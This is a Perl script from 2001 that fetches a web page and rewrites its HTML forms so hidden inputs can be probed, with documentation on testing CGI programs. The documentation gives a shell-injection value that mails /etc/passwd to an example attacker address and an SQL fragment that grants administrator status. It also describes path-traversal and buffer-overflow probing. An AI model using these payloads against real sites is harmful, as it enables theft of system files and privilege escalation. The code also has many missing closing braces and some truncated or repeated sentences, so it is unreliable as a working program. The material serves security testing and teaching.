#!/usr/bin/perl -Tw
# Extract forms from an HTML file and build a new page for them.
# See POD at end for more explanation.
# Eli the Bearded	26 April 2001
use strict;
use CGI;		# oh so handy for CGI parsing
use URI;		# oh so handy for normalizing URLs
require LWP::UserAgent;	# oh so handy for fetching pages

package RewriteForm;	# our package, a subclass of HTML::Parser
use base "HTML::Parser";# oh so handy for HTML parsing

use vars qw( $textarea $isoption $selname %radio $origpage 
             %entity $parser $ua $request $response $query );

%entity = (
  '&'  => '&',
  '<'  => '&lt;',
  '>'  => '&gt;',

$textarea = 0;
$selname = &defselname();

sub defselname () {
  # What to show for a select without a name.
  return '<b>undef</b>';
} # end &defselname 
sub defradioname () {
  # What to show for a radio input without a name.
  return '<b>undef</b>';
} # end &defradioname 
sub defsulmultcount () {
  # How many inputs to show for a select multiple
  return 5;
} # end &defsulmultcount 
sub headers() {
  # HTTP headers
  return "Content-Type: text/html\n\n";
} # end &headers

# Callback for a tag start.
sub start {
  #   oo,    text, hashref, arrayref, text
  my ($self, $tag, $attr,   $attrseq, $origtext) = @_;
  my $esctext;
  my $newtext;
  my @allowed;
  my $selmult = 0;

  if ($tag =~ /^(form|input|select|option|textarea)$/i) {
    my $tagtype = lc($1);
    my $pre  = '';
    my $qstr = '';
    my $post = "\n<br>\n";
    my $skipthis = 0; # used for radio buttons after the first

    $esctext = &quote($origtext);

    if ($tagtype ne 'option' and $isoption) {
      $isoption = 0;
      $pre .= "<i>Was still in \$isoption state. Bad HTML?</i> ";

    if ($tagtype eq 'input') {
      my $inptype;

      @allowed = ( 'type', 'name', 'value', 'accept', 'checked' );

      # We lc() the type since attribute values have the case preserved
      # by HTML::Parser. (Attribute names have been lower-cased for us.)
      if (defined($$attr{type}) and $$attr{type} = lc($$attr{type}) and
          ($$attr{type} eq 'hidden'  or $$attr{type} eq 'password' or
	   $$attr{type} eq 'checkbox'  )) {
        $inptype = $$attr{type};
	$$attr{type} = 'text';
      } else {
        $inptype = $$attr{type};

      if (defined($inptype)) {
	$qstr = &quote($inptype);
	$pre .= "Input type <code>$qstr</code>, ";
      } else {
	$pre .= "Input type unrecognized, ";

      if (defined($$attr{name})) {
	$qstr = &quote($$attr{name});
	$pre .= "named <code>$qstr</code>, ";
	if (defined($inptype) and $inptype eq 'radio') {
	  if (defined($radio{$qstr})) {
	    $post = "Input values for the radio button in the $qstr text " .
	            "input. " . $post;
	    $skipthis = 1;
	  } else {
	    $radio{$qstr} = 1;
	    $$attr{type} = 'text';
	    $post = "Use this text input for $qstr the radio buttons. " .

      } else {
	$pre .= "no name found, ";

      if (!defined($inptype) or ($inptype !~ /hidden|password|text/)) {
        if (defined($$attr{value})) {
	  $qstr = &quote($$attr{value});
	  $pre .= "with value <code>$qstr</code>, ";
	} else {
	  $pre .= "with no value, ";

      if (defined($$attr{src})) {
        my $newimage = URI->new_abs( $$attr{src}, $origpage );
	$$attr{src} = $newimage;
	push(@allowed, qw( src border height width ));

      $pre .= "original HTML <pre>$esctext\n</pre>";

    } elsif ($tagtype eq 'select') {

      $selname = &defselname();

      # @allowed = ( 'name', 'multiple' );
      if (defined($selname = $$attr{name})) {
        $selname = quote($selname);
	$pre .= "Turning select $selname into text input. Any option ";
	$pre .= "values for this select will be printed. ";
	@allowed = ( 'type', 'name' );
	$$attr{name} = 'text';

	if(defined($$attr{multiple})) {
	  $pre .= "Note that this select allows multiple inputs, so ";
	  $pre .= "more than one text input follows. ";
	  $selmult = 1;

    } elsif ($tagtype eq 'option') {

      @allowed = ( 'value', 'selected' );
      $isoption = 1;
      $pre = "Original option HTML <code>$esctext\n</code> ";

    } elsif ($tagtype eq 'form') {
      @allowed = ( 'action', 'method', 'enctype', 'name' );

      if (defined($$attr{action})) {
        my $newaction = URI->new_abs( $$attr{action}, $origpage );
	$$attr{action} = $newaction;
	$qstr = &quote($newaction);
        $pre .= "Form has action <code>$qstr</code>, ";
      } else {
        $pre .= "No action found for form, ";

      if (defined($$attr{method})) {
	$qstr = &quote($$attr{method});
        $pre .= "method <code>$qstr</code>, ";
      } else {
        $pre .= "default method, ";

      $pre .= "original HTML <pre>$esctext\n</pre>";

    } elsif ($tagtype eq 'textarea') {

      @allowed = ( 'name', 'cols', 'rows', 'wrap' );
      $textarea = 1;
      $pre .= "Original HTML <pre>$esctext\n</pre>";

    $newtext = '<' . $tagtype;

    for $_ (@allowed) {
      if (exists($$attr{$_})) {
        $newtext .= ' ' . $_;
	if (defined($$attr{$_})) {
          $newtext .= '="' . $$attr{$_} . '"';

    $newtext .= '>';

    print $pre;
    if ($selmult) {
      my $i;
      print "<ol>\n";
      for ($i = 1; $i <= &defsulmultcount(); $i++) {
	print '<li>' . $newtext . "\n";
      print "</ol>\n";
    } else {
      print $newtext unless ($isoption or $skipthis);
    print $post unless ($textarea or $isoption);

} # end &start 

# Callback for a block of text
sub text {
  my ($self, $text) = @_;

  if ($textarea) {
    print $text;
  } elsif ($isoption) {
    print "Option text for $selname <code>$text</code><br>\n";
} # end &text 

# Callback for a comment
sub comment {
  my ($self, $comment) = @_;

  # We should never be here if $textarea is set, but who knows
  if ($textarea || $isoption) {
    print "<! -- $comment -- >";
} # end &comment 

# Callback for close tag
sub end {
  my ($self, $tag, $origtext) = @_;
  my $esctext;

  if ($tag =~ /^(form|input|select|option|textarea)$/i) {
    my $tagtype = lc($1);
    my $post;
    my $wasoption = $isoption;

    $esctext = $origtext;
    $esctext =~ s/([<>&])/$entity{$1}/g;

    if ($tagtype eq 'textarea') {
      $textarea = 0;
    } elsif ($tagtype eq 'option' or $tagtype eq 'select' or $tagtype eq 'form') {
      $isoption = 0;
      if ($tagtype ne 'option') {
        $selname = &defselname();
    $post = "<br>Close tag was <pre>$esctext\n</pre>";

    print $origtext unless $wasoption;
    print $post unless $wasoption;
} # end &end 

# Quote HTML for safe printing.
sub quote ($) {
  my $string = shift;
  $string =~ s/([<>&])/$entity{$1}/g;
  return $string;

$origpage  = $ARGV[0];

if(defined($origpage)) {
  if ($origpage =~ /^-+h/i) {
    print "Read POD in $0 for help.\n'perldoc $0' should work.\n";
  if ($origpage =~ m<^(?i:http)(://[!-~]{1,2000})$>) {
    $origpage = "http$1";
  } else {
    print "Unrecognized usage. Use as a CGI or read the POD for help.\n";
    print "'perldoc $0' should work.\n";
} else {
  $query     = new CGI;
  $origpage  = $query->param('url');

  print &headers();

if (defined($origpage)) {
  if($origpage =~ m<^(?i:http)(://[!-~]{1,2000})$>) {
    # untainted
    $origpage = "http$1";

    $ua       = LWP::UserAgent->new;
    $request  = HTTP::Request->new('GET', $origpage);
    $response = $ua->request($request);

    print "<html><head><title>Form Rewriter</title></head><body>\n";
    print "<p>page is " . &quote($origpage) . "<br>\n";
    print "page size is " . length($response->content) . " bytes</p>\n";
    $parser = new RewriteForm;
  } else {
    print "<html><head><title>Form Rewriter</title></head><body>\n";
    print "Can't untaint <code>url</code> parameter.\n";
} else {
  my $form = $ENV{SCRIPT_NAME};

  print "<html><head><title>Form Rewriter</title></head><body>\n";
  if (!defined($form)) {
    print "Can't find URL for internal form.\n";
  print "<form action='$form' method=GET>\n";
  print "URL of page to process: <input type=text name=url size=40>\n";
  print "<input type=submit value='go on'></form>\n";

  while(<RewriteForm::DATA>) {
    if ($. == 1) {
      print "<p>POD documentation</p><pre>\n\n";
  if ($. > 1) {
      print "\n\n</pre>\n";
  } else {
      print "\n<p>Didn't find POD to print\n";



=head1 NAME

extract-form : HTML form rewriter for command line or CGI use


This script will fetch an HTML page via HTTP and extract all the
forms out of it. The forms will be rewritten to expose all hidden
inputs, etc, so that random values can be substituted in.  Also
Javascript in the page to verify inputs, etc, will be stripped.
Useful for seeing how CGI programs deal with non-sanctioned input.

During the course of rewriting the forms the script will convert
E<lt>SELECTE<gt> tags, E<lt>INPUT TYPE=RADIOE<gt>,
E<lt>INPUT TYPE=TEXTE<gt>. The E<lt>OPTIONE<gt>tags inside a
E<lt>SELECTE<gt> will be displayed. (All radio buttons after the
first in a series will be displayed rather than converted: one
one value for the set would be sent by a browser.)


From the command line, provide a URL as the first argument:

	extract-form http://www.yahoo.com/

This script will fetch the page, rewrite the HTML and print it
to standard out.

Through a CGI interface, this takes a single parameter C<url> which
has the URL of the page to process. It rewrites the HTML and 
returns it for display in the browser.


Some CGI programmers seem to think that variables whose values 
come from the HTML rather than the user are safe. This form
rewriter makes those variables more visible for poking random
junk in.

There are probably four types of inputs that are most useful to
probe. To an external tester those types are often not inheritantly

=over 4

=item 1

arguments passed to Perl's C<open>

These types of input offer the most power. Clever use of C<&>,
C<|>, C<;> and other shell meta-characters can cause all sorts
of things to happen when used in an C<open> call. A CGI that
sends mail might have a hidden variable that has the recipient's
address, which might be used like this:

	open(MAIL,"| $sendmail '$MAILTO'")

If the MAILTO value were changed to be:

	someone@example.com' ; /bin/mail blackhat@example.net < '/etc/passwd

Then the original mail would still be sent, and then the blackhat
would get the password file.

=item 2

items that get used in SQL statements

With these you can potentially change the meaning of an SQL statement
dramatically, much like the shell example above. rain forest puppy
wrote a nice advisory for Bugtraq a while ago (RFP2K01: How I hacked
Packetstorm, B<http://www.wiretrip.net/rfp/p/doc.asp?id=42>) that
explains how he found that numerical values in the queries at
Packetstorm B<http://packetstorm.securify.com/> were not being checked.
So he changed a C<5> to

	5, Status='Administrator', Security=100, 

to up his privledges on the system.

=item 3

filenames opened safely but displayed in the HTML

These might be templates or page fragments to display after a form
is processed. It might not be opened by Perl or might be used in
a C<sysopen>. With these you might be able to view any file on the
system that the CGI can read and you can think up the name of.
Consider, for example, a filename like one of these:


In Unix, C<..> at the root level leaves you at the root level. So
that second filename is good for anywhere up to twelve levels deep.

=item 4

buffer overflows

Above I said that the Perl open vulnerability gave the most power.
I lied. Buffer overflows can give you even more power if you can
get machine code in the overflow to execute. The way to probe for
a buffer overflow is to try inserting very long values into each
parameter. "Very long" can be a few hundred characters to a few
thousand. Typically people seem to use the letter C<A> repeated.

Once a buffer overflow is found, exploiting it can be tricky.
You need to know the type of computer running the CGI (services
like Netcraft, B<http://www.netcraft.com/>, can help you identify
the system). You need to have a suitible shell code to use. Aleph
One's paper "Smashing The Stack For Fun And Profit",
explains how to craft shell code or a search engine might find you



It would be really nice if the script could figure out what text
is used to label form inputs so that could be printed with the
rewritten form. Although HTML 4.0 includes a E<lt>LABELE<gt> tag
for just that purpose, this script does not attempt to use them.
Most web pages don't have them, anyway.

It could be useful if the script could add additional form elements.

It could be useful if the script could add additional form elements.
Some CGI programs check the value of the submit button, but this
does not provide a way to alter that. This is slightly tricky to
alter since if there are multiple submit buttons they could have
different C<NAME> attributes, but the browser would only return
the name and value of the one clicked. Also image submit buttons
return two values, a C<{name}.x> and a C<{name}.y> with pixel
coordinates to indicate where in the image the user clicked. 

It would be nicer if the script could be flexible about how many
inputs to provide for a E<lt>SELECT MULTIPLEE<gt> statement.

It would be handy if the script could automatically generate long
strings for buffer overflow testing.


This script is by Eli the Bearded. The home source for it is
his directory at CPAN, I<http://www.cpan.org/authors/id/E/EL/ELIJAH/>.
This script is released to the public domain. Modifications and
redistribution is encouraged. Leaving an attribution to Eli the
Bearded would be nice, but is not required.

=head1 OSNAMES

This should not have any OS dependencies. NCSA and Apache style
environment variables might be needed for CGI use.

=head1 CPAN INFO



=head1 README

HTML form rewriter for command line or CGI use. Rewritten forms
have hidden inputs exposed for probing.


This script uses the C<strict>, C<vars>, C<CGI>, C<URI>, C<LWP::UserAgent>,
and C<HTML::Parser> modules. Either version 2 or 3 of HTML::Parser should


The CGI module really should be optional if not running as a CGI, but this
is not written to allow that.
